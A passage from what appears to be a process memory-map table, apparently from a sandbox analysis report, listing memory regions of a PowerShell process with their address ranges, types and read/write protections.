pagefile_0x00000194c54a0000 0x194c54a0000 0x194c54a1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c54b0000 0x194c54b0000 0x194c54b0fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x194c54c0000 0x194c54c2fff Memory Mapped File Readable False False False -
private_0x00000194c54d0000 0x194c54d0000 0x194c54d0fff Private Memory Readable, Writable True False False -
private_0x00000194c54e0000 0x194c54e0000 0x194c54e0fff Private Memory Readable, Writable True False False -
private_0x00000194c54f0000 0x194c54f0000 0x194c54f6fff Private Memory Readable, Writable True False False -
pagefile_0x00000194c5500000 0x194c5500000 0x194c5500fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000194c5510000 0x194c5510000 0x194c551ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000194c5520000 0x194c5520000 0x194c561ffff Private Memory Readable, Writable True False False -
private_0x00000194c5620000 0x194c5620000 0x194c562ffff Private Memory Readable, Writable True False False -
private_0x00000194c5630000 0x194c5630000 0x194c5630fff Private Memory Readable, Writable True False False -
private_0x00000194c5640000 0x194c5640000 0x194c5640fff Private Memory Readable, Writable True False False -
private_0x00000194c5650000 0x194c5650000 0x194c565ffff Private Memory Readable, Writable True False False -
private_0x00000194c5660000 0x194c5660000 0x194c56cffff Private Memory Readable, Writable True False False -
private_0x00000194c56d0000 0x194c56d0000 0x194c56dffff Private Memory Readable, Writable True False False -
private_0x00000194c56e0000 0x194c56e0000 0x194c56effff Private Memory Readable, Writable True False False -
pagefile_0x00000194c56f0000 0x194c56f0000 0x194c58f7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5900000 0x194c5900000 0x194c5a80fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c5a90000 0x194c5a90000 0x194c6e8ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00000194c6e90000 0x194c6e90000 0x194c6e90fff Pagefile Backed Memory Readable True False False -
winnlsres.dll